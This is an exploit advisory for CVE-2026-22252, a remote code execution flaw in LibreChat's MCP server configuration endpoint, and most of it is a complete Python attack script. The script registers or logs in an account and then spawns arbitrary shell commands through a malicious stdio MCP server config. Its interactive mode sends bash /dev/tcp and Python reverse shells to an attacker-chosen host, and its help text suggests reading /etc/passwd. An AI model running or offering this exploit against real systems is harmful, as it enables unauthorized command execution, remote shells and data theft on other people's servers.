============================================================================================================================================= | # Title : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.librechat.ai/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252 [+] Summary : A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat’s Model Context Protocol (MCP) server management functionality. The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type. An authenticated attacker can abuse the /api/mcp/servers endpoint to define a malicious MCP server configuration that executes arbitrary system commands on the host running LibreChat. Because the application directly spawns operating system processes based on user-controlled parameters without proper sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service. Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence, and lateral movement within the hosting environment. The vulnerability represents a design-level security flaw rather than a simple input validation issue and poses a severe risk in production deployments [+] POC : #!/usr/bin/env python3 import requests import json import sys import re import time import argparse import signal import logging from typing import Optional, Dict, Any, Tuple, List from dataclasses import dataclass from enum import Enum from urllib.parse import urljoin logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(__name__) class TransportType(Enum): STDIO = "stdio" SSE = "sse" HTTP = "http" @dataclass class AuthResult: success: bool token: Optional[str] = None cookies: Optional[Dict] = None session_id: Optional[str] = None csrf_token: Optional[str] = None message: str = "" class LibreChatExploit: def __init__(self, target_url: str, timeout: int = 30): self.target_url = target_url.rstrip('/') self.timeout = timeout self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive', }) self.auth_result = AuthResult(success=False) self.csrf_token = None def _extract_csrf_token(self, response_text: str) -> Optional[str]: patterns = [ r'name="csrfToken" value="([^"]+)"', r'"csrfToken":"([^"]+)"', r'window\.csrfToken = "([^"]+)"', r' Dict[str, str]: try: health_check = self.session.get( f"{self.target_url}/health", timeout=self.timeout ) for endpoint in ['/api', '/api/v1', '/api/v2']: try: response = self.session.get( f"{self.target_url}{endpoint}", timeout=self.timeout, allow_redirects=False ) if response.status_code < 400: logger.info(f"Found API interface at: {endpoint}") break except: continue except Exception as e: logger.debug(f"System check failed: {e}") return { 'register': '/api/auth/register', 'login': '/api/auth/login', 'mcp_servers': '/api/mcp/servers', 'user_info': '/api/auth/me', } def check_target(self) -> Tuple[bool, str, Optional[str]]: try: response = self.session.get( self.target_url, timeout=self.timeout ) if response.status_code != 200: return False, "Server unavailable", None html_content = response.text indicators = ['LibreChat', 'librechat', 'Evo', 'Next.js', 'authToken'] is_librechat = any(indicator in html_content for indicator in indicators) if not is_librechat: return False, "This may not be a LibreChat server", None version_patterns = [ r'"version":"([^"]+)"', r'librechat-([\d\.]+)', r'v(\d+\.\d+\.\d+)', ] version = None for pattern in version_patterns: match = re.search(pattern, html_content) if match: version = match.group(1) break self.csrf_token = self._extract_csrf_token(html_content) if self.csrf_token: self.session.headers.update({'X-CSRF-Token': self.csrf_token}) return True, "LibreChat confirmed", version except requests.RequestException as e: return False, f"Connection error: {e}", None def register_user(self, username: str, password: str, email: str) -> bool: endpoints = self._get_base_endpoints() url = urljoin(self.target_url, endpoints['register']) headers = {"Content-Type": "application/json"} if self.csrf_token: headers['X-CSRF-Token'] = self.csrf_token payload = { "name": username[:50], "email": email[:100], "password": password, "confirm_password": password, "username": username[:30] } try: response = self.session.post( url, json=payload, headers=headers, timeout=self.timeout ) logger.debug(f"Registration response: {response.status_code}") if response.status_code in [200, 201, 302]: logger.info(f"[✓] User registered: {username}") if 'csrf' in response.text.lower(): self.csrf_token = self._extract_csrf_token(response.text) if self.csrf_token: self.session.headers.update({'X-CSRF-Token': self.csrf_token}) return True else: logger.warning(f"Registration failed (HTTP {response.status_code}): {response.text[:200]}") return False except Exception as e: logger.error(f"Error during registration: {e}") return False def login(self, email: str, password: str) -> AuthResult: endpoints = self._get_base_endpoints() url = urljoin(self.target_url, endpoints['login']) headers = {"Content-Type": "application/json"} if self.csrf_token: headers['X-CSRF-Token'] = self.csrf_token payload = {"email": email, "password": password} try: response = self.session.post( url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True ) logger.debug(f"Login response: {response.status_code}") if response.status_code in [200, 201, 302]: token = None try: data = response.json() token = data.get('token') or data.get('accessToken') or data.get('authToken') except: pass cookies = dict(self.session.cookies) if self.session.cookies else {} new_csrf = self._extract_csrf_token(response.text) if new_csrf: self.csrf_token = new_csrf self.session.headers.update({'X-CSRF-Token': self.csrf_token}) auth_valid = self._verify_authentication() self.auth_result = AuthResult( success=auth_valid, token=token, cookies=cookies, csrf_token=self.csrf_token, message="Login successful" if auth_valid else "Authentication invalid" ) if auth_valid: logger.info("[✓] Login and authentication successful") else: logger.warning("[!] Login succeeded but session is invalid") return self.auth_result else: error_msg = f"Login failed: {response.status_code}" if response.text: error_msg += f" - {response.text[:100]}" logger.error(error_msg) return AuthResult(success=False, message=error_msg) except Exception as e: error_msg = f"Login error: {e}" logger.error(error_msg) return AuthResult(success=False, message=error_msg) def _verify_authentication(self) -> bool: endpoints = self._get_base_endpoints() url = urljoin(self.target_url, endpoints['user_info']) try: response = self.session.get(url, timeout=self.timeout) if response.status_code == 200: user_data = response.json() return bool(user_data.get('username') or user_data.get('email')) except: pass return False def check_mcp_endpoint(self) -> Tuple[bool, str]: endpoints = self._get_base_endpoints() url = urljoin(self.target_url, endpoints['mcp_servers']) try: response = self.session.get(url, timeout=self.timeout) if response.status_code == 401: return False, "Authentication required" elif response.status_code == 403: return False, "Forbidden - Might require Admin privileges" elif response.status_code == 404: return False, "Not Found - Version mismatch" elif response.status_code == 200: return True, "Available" else: return False, f"Unknown status: {response.status_code}" except Exception as e: return False, f"Connection error: {e}" def execute_command(self, command: str, shell_path: str = None) -> Tuple[bool, str]: if not self.auth_result.success: return False, "Unauthorized" endpoints = self._get_base_endpoints() url = urljoin(self.target_url, endpoints['mcp_servers']) shell_path = shell_path or '/bin/sh' safe_command = f"({command}) 2>&1" payload = { "config": { "type": "stdio", "title": f"server_{int(time.time())}", "command": shell_path, "args": ["-c", safe_command] } } headers = {"Content-Type": "application/json"} if self.auth_result.token: headers['Authorization'] = f"Bearer {self.auth_result.token}" if self.csrf_token: headers['X-CSRF-Token'] = self.csrf_token try: logger.info(f"Sending command to: {url}") response = self.session.post( url, json=payload, headers=headers, timeout=self.timeout ) if response.status_code in [200, 201]: try: data = response.json() error = data.get('error') or data.get('message', '') if error and 'fail' in error.lower(): return False, f"Server rejected: {error}" except: pass return True, "Command sent" else: return False, f"Execution failed: {response.status_code} - {response.text[:200]}" except requests.Timeout: return False, "Timeout - Command might be running" except Exception as e: return False, f"Error: {e}" def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]: test_file = f"/tmp/librechat_test_{int(time.time())}.txt" test_command = f"id && whoami && hostname && echo 'test' && date > {test_file} 2>&1" success, message = self.execute_command(test_command) if success: return True, "Vulnerability likely exists (Command sent)", None else: return False, f"Vulnerability not found: {message}", None class InteractiveShell: def __init__(self, exploit: LibreChatExploit): self.exploit = exploit self.running = True signal.signal(signal.SIGINT, self.signal_handler) signal.signal(signal.SIGTERM, self.signal_handler) def signal_handler(self, signum, frame): logger.info("\n[!] Shutdown signal received...") self.running = False def run(self): print("\n" + "="*60) print("Interactive Mode - Type 'help' for menu") print("Type 'exit' to quit") print("="*60) command_history = [] rate_limit = 1 last_command_time = 0 while self.running: try: current_time = time.time() if current_time - last_command_time < rate_limit: time.sleep(rate_limit - (current_time - last_command_time)) try: cmd = input("\nexploit> ").strip() except EOFError: break except KeyboardInterrupt: continue if not cmd: continue last_command_time = time.time() command_history.append(cmd) if cmd.lower() == 'exit': break elif cmd.lower() == 'help': self.show_help() elif cmd.lower() == 'history': for i, h in enumerate(command_history[-10:], 1): print(f"{i}: {h}") elif cmd.lower() == 'status': print(f"Auth: {'Success' if self.exploit.auth_result.success else 'Failed'}") print(f"CSRF: {'Present' if self.exploit.csrf_token else 'Missing'}") elif cmd.lower().startswith('shell'): self.handle_reverse_shell(cmd) else: success, message = self.exploit.execute_command(cmd) print(f"[{'✓' if success else '✗'}] {message}") except Exception as e: logger.error(f"Shell error: {e}") time.sleep(1) def show_help(self): print(""" Commands: exit - Exit help - Show this menu history - Show last 10 commands status - Auth status shell [LHOST] [LPORT] - Spawn reverse shell Examples: id, pwd, ls -la, cat /etc/passwd """) def handle_reverse_shell(self, cmd: str): parts = cmd.split() if len(parts) < 3: print("[!] Usage: shell [LHOST] [LPORT]") return lhost, lport = parts[1], parts[2] print(f"[*] Preparing reverse shell to {lhost}:{lport}") shells = [ f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'", f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", ] for i, s_cmd in enumerate(shells, 1): print(f"[*] Attempting shell #{i}...") success, message = self.exploit.execute_command(s_cmd) if success: print("[✓] Shell sent. Check your listener.") break def main(): parser = argparse.ArgumentParser(description='LibreChat MCP RCE Exploit') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-c', '--command', help='Command to execute') parser.add_argument('--test', action='store_true', help='Test vulnerability') parser.add_argument('--interactive', action='store_true', help='Interactive mode') parser.add_argument('--username', default='test_user') parser.add_argument('--password', default='Test12345!') parser.add_argument('--email', default='test@example.local') parser.add_argument('--timeout', type=int, default=30) parser.add_argument('--verbose', '-v', action='store_true') args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) print("="*60) print("LibreChat MCP RCE Exploit - Enhanced") print("CVE-2026-22252") print("="*60) exploit = LibreChatExploit(args.url, args.timeout) print("[*] Checking target system...") ok, msg, ver = exploit.check_target() if not ok: print(f"[✗] {msg}") sys.exit(1) print(f"[✓] {msg} (Version: {ver or 'Unknown'})") print(f"\n[*] Authenticating as {args.username}...") auth = exploit.login(args.email, args.password) if not auth.success: print("[*] Attempting registration...") if exploit.register_user(args.username, args.password, args.email): auth = exploit.login(args.email, args.password) if not auth.success: print(f"[✗] Authentication failed: {auth.message}") sys.exit(1) print("[✓] Authentication successful") if args.test: vuln, msg, out = exploit.test_vulnerability() print(f"\n[{'✓' if vuln else '✗'}] {msg}") elif args.command: success, msg = exploit.execute_command(args.command) print(f"[{'✓' if success else '✗'}] {msg}") elif args.interactive: shell = InteractiveShell(exploit) shell.run() if __name__ == "__main__": try: main() except KeyboardInterrupt: print("\n[*] Interrupted by user") sys.exit(0) Greetings to :============================================================ jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*| ==========================================================================